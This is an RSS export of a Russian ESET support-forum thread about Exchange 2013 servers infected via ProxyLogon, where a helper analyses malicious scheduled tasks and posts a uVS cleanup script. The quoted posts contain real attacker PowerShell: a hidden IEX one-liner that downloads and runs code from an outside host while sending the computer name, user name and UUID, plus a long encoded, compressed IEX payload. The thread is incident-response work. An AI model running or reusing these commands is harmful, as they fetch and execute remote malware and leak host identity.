			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112138/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			выполните в uVS скрипт для очистки задач, без перезагрузки системы:<B> поправил скрипт</B><br /><br />
====code====
<pre> ;uVS v4.11.6 &#91;http://dsrt.dyndns.org:8888&#93;
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT

apply

QUIT
</pre>
============= <br />
			<i>17.03.2021 17:33:02, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112138/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112138/</guid>
			<pubDate>Wed, 17 Mar 2021 17:33:02 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112137/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_SJ7dAyFU" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />сервер можно будет перегрузить (скриптом)?<br />=============<br />Через пол часа можно будет.<br /><br />====quote====<br /><a class="blog-p-user-name" id="bp_mN6APe5S" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br /><br />====quote====<br /> &nbsp;Владимир &nbsp;Шариков &nbsp;написал:<br />Что этот код делает? Стоит ли боятся &quot;Последствий&quot; этой бяки?<br />=============<br />шифрованный код. понятно, что расшифровывается на вашей системе, или наоборот в зашифрованном виде уходит в сеть<br />=============<br />Как его возможно расшифровать? Нужно понять что хакер хотел добиться. Как мы поняли хекер воспользовался уявимостью, при обращение к екчанджу происходит срабатывания нескольких скриптов (каких мы не знаем). Но заметили что меняются ДНСы сервера. <br /><br />====quote====<br /><a class="blog-p-user-name" id="bp_xnAqdcIT" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />есть задачи, через которые возможно пытаются перехватить пароли.<br /><br />====quote====<br />C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE<br />-W HIDDEN -C I`EX (&#91;SYSTEM.TEXT.ENCODING&#93;::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))<br />=============<br /><br />=============<br />Вот это слово &quot;Возможно&quot; пугает ))) Тут как я понимаю срабатывает Имя ПК, Индефикатор, и имя пользователя. <br />
			<i>17.03.2021 17:32:08, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112137/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112137/</guid>
			<pubDate>Wed, 17 Mar 2021 17:32:08 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112136/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Экстренные исправления для недавно обнаруженных критических уязвимостей в почтовом сервере Microsoft Exchange появились не сразу, и у организаций было мало времени на подготовку до начала массовой эксплуатации.<br /><br />Эта ошибка, получившая название<B> ProxyLogon</B>, использовалась в дикой природе еще до того, как Microsoft получила отчет об уязвимости, что дает злоумышленникам двухмесячный старт для взлома целей до появления обновлений безопасности.<br /><br />Уязвимые серверы являются горячими целями для широкого спектра групп злоумышленников, которые ищут исходную точку опоры в сети для шпионажа или финансовых целей. <B>Злоумышленники, Ransomware и майнинг криптовалют уже использовали ProxyLogon.</B><br /><br />С выпущенными исправлениями и появлением кода эксплойта PoC в сети тысячи серверов Microsoft Exchange по всему миру продолжают оставаться уязвимыми, а количество атак по-прежнему вызывает тревогу. <br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/</a></noindex> <br />
			<i>17.03.2021 17:30:04, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112136/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112136/</guid>
			<pubDate>Wed, 17 Mar 2021 17:30:04 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112135/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_SJfjvsPo" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br />Что этот код делает? Стоит ли боятся "Последствий" этой бяки?<br />=============<br />шифрованный код. понятно, что расшифровывается на вашей системе, или наоборот в зашифрованном виде уходит в сеть<br /><br />сервера похоже, китайские<br />[FILE ID=118960]<br /><br />это зависит от &nbsp;того, как долго данные задачи работали на серверах. возможно установили бэкдоры, возможно сливали почтуЮ возможно, пытались получить данные из Active Directory, возможно готовились к шифрованию доступных узлов из сети.<br /><br />стоит конечно тщательно отсканировать клиентские системы и другие сервера, в том числе контроллеры домена. <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118960&" width="562" height="471" /><br /><i>17.03.2021 17:24:49, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112135/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112135/</guid>
			<pubDate>Wed, 17 Mar 2021 17:24:49 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112134/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<B>сервер можно будет перегрузить (скриптом)?</B> <br />
			<i>17.03.2021 17:23:44, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112134/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112134/</guid>
			<pubDate>Wed, 17 Mar 2021 17:23:44 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112133/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Вот это не ясно <noindex><a href="http://t.netcatkit.com/a.jsp?_20210317" target="_blank" rel="nofollow"><S>http://t.netcatkit.com/a.jsp?_20210317</S></a></noindex><S>?</S> : <table class="forum-spoiler"><thead onclick="if (this.nextSibling.style.display=='none') { this.nextSibling.style.display=''; BX.addClass(this, 'forum-spoiler-head-open'); } else { this.nextSibling.style.display='none'; BX.removeClass(this, 'forum-spoiler-head-open'); } BX.onCustomEvent('BX.Forum.Spoiler:toggle', [{node: this}]); event.stopPropagation();"><tr><th><div>Скрытый текст</div></th></tr></thead><tbody class="forum-spoiler" style="display:none;"><tr><td>I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('ad59f973db46acfed9fe2b588e12919548ebb21d3ba369555fd16b7c3cc<WBR/>&shy;b49dab15c85225712235e5d52b6d5d8ff7b3f60495d71dbbc99a79b4b2c1<WBR/>&shy;68be303b0f247c66d37caae32797778d8f3ff129a25fed4de985f4b7ebad<WBR/>&shy;76a97323913cfdbdb257f34f4a3b6ee8f6c7ceb3c107abb6d5db4f65b07b<WBR/>&shy;b9e531f366b43cfa98956a3f6e6c075f6466e6d7fb8d720d2a9e4b95359c<WBR/>&shy;c9d4a9edb745b6e4decefbea9d7dcdac873446358abef3586adc648d45a4<WBR/>&shy;e0da4108f0531bf6e6f6f9542e613eee57c30c07c5ab55a7de81cbc715a8<WBR/>&shy;dd6c81bee356bad7da7d1744607fbc2dd3d203e201de793c7cbd9639eee1<WBR/>&shy;c34eac3dd66c3dbf51acd03d1721a62bf2e76476f769bf5835dd7032d343<WBR/>&shy;09a456ee6c79146938c92c712ddf6843b937e36b78fe43cc9e2b17492c9d<WBR/>&shy;c3e3fde85368fa470326198f6511c26b34cbc73d2094d7c1ac5b8e34ebe9<WBR/>&shy;6824abb34b06fe25e26fd686c941f1b65134b6d4991cd64a495828d95452<WBR/>&shy;62327044bacade1519289934ddafad161ff931f79f143daefcdd34c84cd4<WBR/>&shy;63190c40f42a6131104fd8f759b54c11305f149b5b636767d4d577cfa3fe<WBR/>&shy;a9ad58ddc60e609ed475b3cc2174e1ed5e5920d8d2f7730b089118464ae1<WBR/>&shy;954433ce90b6e75699ffa818026ae85e37582e097792652a3586d9da56e9<WBR/>&shy;a8a49ceda50226a3ed4a0842d36cd2b618541fbfbd651d317fce9415ec5b<WBR/>&shy;292af33af55e6f4282cc07397b7f28d16fbe5bb6deb4bec47c6ad3b71e4e<WBR/>&shy;ddd9dd17a63dbbbfb95bd5ddb3ea8550ef66dbbde68984f6722b3ae1dd82<WBR/>&shy;4d4aca37816659ab1573196a3e6ab3dd3d42a9aceda500bb87132b77cd87<WBR/>&shy;361a20da52dc6f34d3ec5b3cc8a66011c27dfe70f0674915944b4496c22c<WBR/>&shy;8d50ef40db6f9fe3694403020d584c21331123010544b01c522bef2d8d6a<WBR/>&shy;bfcdadecee41c8eaed0e2bf0c26a2fbc32c4cfa0a6d20e0b3eb647033aca<WBR/>&shy;cd870bc7f3717828b17982809bf9b0ba3d71a1bec1aa1150d663280b7eb9<WBR/>&shy;32c4b0e777668c84eff0c229181d276e350e1d70f25d041d5f86c17b499a<WBR/>&shy;da8a6be2224d5ba70fc9c25d1da6912f899a1efe8e66dcdb61b77ec66b8a<WBR/>&shy;4e51321433f03a5b144a02b6088eb274e60e7a1bf18b8fb17a2ae27a20c7<WBR/>&shy;7a000f8e2d14cc2c299619a7637ed46d77120fe6d855f667e9029b23b4de<WBR/>&shy;f78a11ff969269d2c963ac20d5b0a93018731f6440a3dba3cbffa7073727<WBR/>&shy;dd1393fc1fdf1ccf768137027eb21f4e3e117e1661a98371b831c34a502b<WBR/>&shy;42b197b333733ed0f1fbac798193a2e4da4f0f914fa97ab132f44f610cb6<WBR/>&shy;9c773124c3f8aa3913f9e412642d027ed6122a4d008b8fc04be3c0c84079<WBR/>&shy;4fb5f6017253ad33e775cc7f3a4485310a722005f2b97cb1af932cdb43a9<WBR/>&shy;68fd3e1b7cb5b6ee0609a92e21226c29ad158c94fda88096f69aa7d04d12<WBR/>&shy;08e2d451238ae30f473df95711a8f780fa4598d82c7ace803bdc2333e223<WBR/>&shy;c31035c66a990853a3ff416aa048238c0ca6f847a6069c810a4cc5409631<WBR/>&shy;f33357183206c9e5bfa4e132782239cca383cf783c04f851b475e6adc623<WBR/>&shy;15fc65108dfc0fd1bdf9d3284ada4b2819dc59913e433d89f1dc9c67dc94<WBR/>&shy;61f7d4fc4304d26e32010d2e42cb2bd3d8613e414579379eabb4e702ec25<WBR/>&shy;8ce618b575f4b613a0bc1b1f6ac7d056ad345058a18903a1d170eaa3dbf2<WBR/>&shy;d85226cf3bd9dfad950453c6947faf7b44be35669c046d81fd358371ac5c<WBR/>&shy;af5f93235cc351fe9a6840a73cd02446b06063af78e1f90d79c4a217a581<WBR/>&shy;639720c9fa8355a664e4564ccec669ea86a4abfc626ee69960ea25832a70<WBR/>&shy;d92dc6b81339b6c4e63193af02ea6ba39ed6df258bd7fdab9693608abb08<WBR/>&shy;bc234447801f50246eed8a1d65687d910b1547d9844f06c2a9879d297705<WBR/>&shy;762d7c89c3029cc798cba46b33ee42bebaf52ddb47bb361cea8563d80bb2<WBR/>&shy;bcddf5e8b11c510797b274d45380c086adec78ef7c9cf26578ecc7c2720f<WBR/>&shy;10c5d458afd490ced93c74c44e4f0e04c9133fc424b5f8807ab702310f55<WBR/>&shy;ce92799dd13122cfcbf38c2edff71ee1d75a31827f73a16881a75a518184<WBR/>&shy;6243e3f50647f26764063fb410cddcf810f17376d9dc03c80906a4bba51c<WBR/>&shy;e81bbded8b76b78d60f5bcdbdbd839dfa0e5c2d74e4bc4cf54529bc6f93b<WBR/>&shy;0f6fd225c433f5143888b2857849fd08d89543726280b0115640904902a2<WBR/>&shy;6ca5514826b690b55610f9a3f4faea418c13d23f2bc633f25af828f0664a<WBR/>&shy;3f338f201bd1098406aabe3791bf45ccd916057540eb887fdffa092b14b4<WBR/>&shy;00842c00897972a7c96e5e515150e3d2e2fef515e6ed427aa8cf8ff5d212<WBR/>&shy;f41508e2cf483246b28b8b1e08f2e0a9db39bdf9e2e3e768fbb9da7b393d<WBR/>&shy;3cbeba313ae76fc346ad75f9c70ed0090a2a7cef9714ee8306109f65cc9c<WBR/>&shy;53f2117d7ef28ff3ad209d3f6cf46e9bebacc72554e68554a4e7918bda66<WBR/>&shy;cbd9dc270410c7129051585c54a5d9f66895142eb5014a10fc8b6c29a203<WBR/>&shy;0351a26d3670814abd09645158b3261e8a93abd23c73342e7f7c8bf9abee<WBR/>&shy;3f2c4cdc6c545d9ebc61ee40c21e528e216c6280b77126be50adfaa94dfe<WBR/>&shy;69d5db98ca1d0abe09b86e0c5b9e018e9e3d62852b78a4a484d28aef8de4<WBR/>&shy;6cb840830bfdee651fe7f6f9c68fa32dfa41bad13f54e8899b745cd9a3ec<WBR/>&shy;3c8cbd2977600bb82c7a05d88f00fa51f9322912c3a0c9ef5967a061a03c<WBR/>&shy;e2a0d815d14cf12f8092df5035fa825da402a800b9086c105d04ea076548<WBR/>&shy;04b812d9e9339e807971adbc9d5fa13be9587911a214bb61484e5c85684f<WBR/>&shy;876379fc87dd6b6433e1a99cf02e9794de85599d52e73e3f34e9fcbe6a24<WBR/>&shy;2293f0192fef8e38fa7d5b1d76aec7519d0b7e66809f6354244544b1416b<WBR/>&shy;99bc17410a65dc31a9a15c0b5b1205011658455c758a55d37bf924c18be2<WBR/>&shy;df9779cd06a8f3544c510369f3e3fbff53f8b478303ab68b69818d531e8a<WBR/>&shy;1266af057930454f28b1f019cc9be42aede5a2a8d7c8cca3d02e6b3bffc0<WBR/>&shy;40e259c702dd92c895535a2480cd6ea2df654a99bb6cd82abfd9877a6595<WBR/>&shy;5bdc52af795dfe7083558ea18d5921a3351719394ca66f59a7aa83d0ddaf<WBR/>&shy;4691f057184a0a012672d18cb15bdcfdab601fd3a07de7ffa0458549975c<WBR/>&shy;530ead4a0eebfd4a0420cd37c4b4154d7acab139eabd1b4ef778c8afec43<WBR/>&shy;ea059da6b80950664a2a656db996baf20feaba5e46bd78469af374736e12<WBR/>&shy;c19c28173ff22d82c773f9ffcf6ad7f984f0827a2ab9435abbc098930047<WBR/>&shy;c35303572d2b26a1001d501852262b28d4f27156f57bce16602eb7b001df<WBR/>&shy;b1cd8f4886844e7502d97cf8278e8047df17e657ab95cbd45debb5be3b9c<WBR/>&shy;8ec4a18c6dd7a9b45d1f4ee08dbc4461e293e30ae8ec0787a77c491846c8<WBR/>&shy;1ea10609e5310b6313a70d36c560c280627439c25a92851f96ee5148d663<WBR/>&shy;58af56ecef92c6cb96203578b257197e76c2eda40fdcd6b528bcd4b3aeaf<WBR/>&shy;7eac25b58b948b6c8bc5cb55266cd2bdc0d899a2b128dd7456a6e88347e5<WBR/>&shy;1a626245030c9477d0ba9e8e205b1784eab58f457b9a6f6d68ada7f952fa<WBR/>&shy;9bda5a9534cfafa27b573e1b6d1dce64da26acb507652d1efa85615bebad<WBR/>&shy;2aaa2db0c30a82ddad436f919ea6cb42a173d14b7a8317bc291eee45212b<WBR/>&shy;8fd6c94dfd8fc44f01dd8fc4451ba52c6e729a58daaa40272f495553afab<WBR/>&shy;d634354b9b1ace67d24bea94100c2a14842b920c29c541d3c54a11a763ac<WBR/>&shy;2deddfc6442376998dce2db5156d5c6308a65bc7d00114a612ccf9d6875d<WBR/>&shy;96c54f59addd217851454ba08db5ef7e437f4801acc820e02504c47b1aa5<WBR/>&shy;4bfa37a6d7b8beccc65f3d656890a7b4ebde821fe2531934b9546c817417<WBR/>&shy;eae439cf40a8abe8a9eeb8edc52b1c5f70a63fb1d2798d4465237f40f50a<WBR/>&shy;4d519631c4dfc7b648cc83a9eb9530bad3c5f0de86a09967dd8cbe2f6616<WBR/>&shy;beb595b980bfc91180643065db4b9cbc5f4e3bc80401be6e840af5c66e6b<WBR/>&shy;055a2191d299d3975f57922b8118f997d12c171494587879dde51b76b03f<WBR/>&shy;1f3f269b99462b2450a5e72a2a0594a86171b405f1c59ed6033b1ccec2f6<WBR/>&shy;94205afd290021d38f246b0475e5b8fee3d1bb9964fe1236fdc5e1eb7e1c<WBR/>&shy;ed8466544b7368e2f8932ef7d295775e95c94c7ec404463105891d01a8d5<WBR/>&shy;a73f7600f7f60d046d6bbbccd426ca1484a9250e4a214d377c017c65b1e0<WBR/>&shy;2e29235b35a16204b864585c01d4f27419ba0ca7c935b6e3e20a0936ce64<WBR/>&shy;2f56c327f872668f57831f270ee5eadef317b3e2810f9d6564816a8b5720<WBR/>&shy;8599a4cd3b6feeed793df07ef2f8f3aef07e79da377dd8b937eeff2f4e65<WBR/>&shy;3e7faa44f7fb58469dc5e1e2ff52f4723dfa54c5a7a203b7c8a1ff65acdc<WBR/>&shy;605008da95d19e2df046c627a135fcfa2fef5c959b77773fd7b7fc11b4c1<WBR/>&shy;e1ca9a8c92ad404e9240aad442aa39fe0bd7a899f7d62fde258414bf15d1<WBR/>&shy;cfdb3b909b5790532e55a317f2dc674cc383f3c6402ba4f20eb4efcc0e3d<WBR/>&shy;3f20d0238068cf1c4c73af9611e0e7716bd5fdfabe08f0f3e74b9a135b8b<WBR/>&shy;3da60d12f0dfa97b32c88e3a9f9bce842f2bf01d2a998b771c8f34f33fa4<WBR/>&shy;5b3b370eae53a3c192d27599f7c4b999e0695cdb9eba741347f005f1c72f<WBR/>&shy;14d4d391ed591c1d98c3ad9866665749a748c8c42fe520a51b98cdb2be1a<WBR/>&shy;3983e3fe70501dfe7859755cf394eb7bebfe4c92b1e2e7868e65ab143032<WBR/>&shy;bd96799c0f906ef7733be0b871fc75e88b39a969d3d66b96ab672c429427<WBR/>&shy;4c71f0d90a882e2bf3c56d5a2de7891eb74da9a4eed201e2b969b0ca1c99<WBR/>&shy;cd9f3f6df'-split'(..)'|?{$_}|%{&#91;convert&#93;::ToUInt32($_,16)}))), &#91;IO.Compression.CompressionMode&#93;::Decompress)), &#91;Text.Encoding&#93;::ASCII)).ReadToEnd();</td></tr></tbody></table>Что этот код делает? Стоит ли боятся &quot;Последствий&quot; этой бяки? <br />
			<i>17.03.2021 17:14:21, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112133/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112133/</guid>
			<pubDate>Wed, 17 Mar 2021 17:14:21 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112132/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Да. &nbsp; <br />
			<i>17.03.2021 17:11:16, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112132/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112132/</guid>
			<pubDate>Wed, 17 Mar 2021 17:11:16 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112131/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			сервер удаленного управления сами ставили?<br />C:\PROGRAM FILES (X86)\LITEMANAGER PRO - SERVER\ROMSERVER.EXE<br /><br />есть задачи, через которые возможно пытаются перехватить пароли.<br /><br />====quote====<br />C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE<br />-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))<br />=============<br /><br />update: возможно, здесь выполняется скачивание зашифрованного скрипта с адреса DOWN.SQLNETCAT.COM, (причем судя по префиксу 20210317 он может обновляться), а далее, powershell.exe его расшифровывает, и выполняет. <br />
			<i>17.03.2021 17:10:12, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112131/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112131/</guid>
			<pubDate>Wed, 17 Mar 2021 17:10:12 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112130/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Здравствуйте. MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. Удалять сам не стал из "шидулера", реестра. Обновления на двух серверах уже установили, закрывающую уязвимость. Если будут еще какие то комментарии напишите пожалуйста. <br />Положу сюда сразу два образа двух серверов. Если необходимо могу тему скопировать, по одному образу выложу. <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118950">SPHVMAIL01_2021-03-17_16-33-37_v4.11.6.7z</a><br /><i>17.03.2021 16:49:30, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112130/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112130/</guid>
			<pubDate>Wed, 17 Mar 2021 16:49:30 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
	</channel>
</rss>
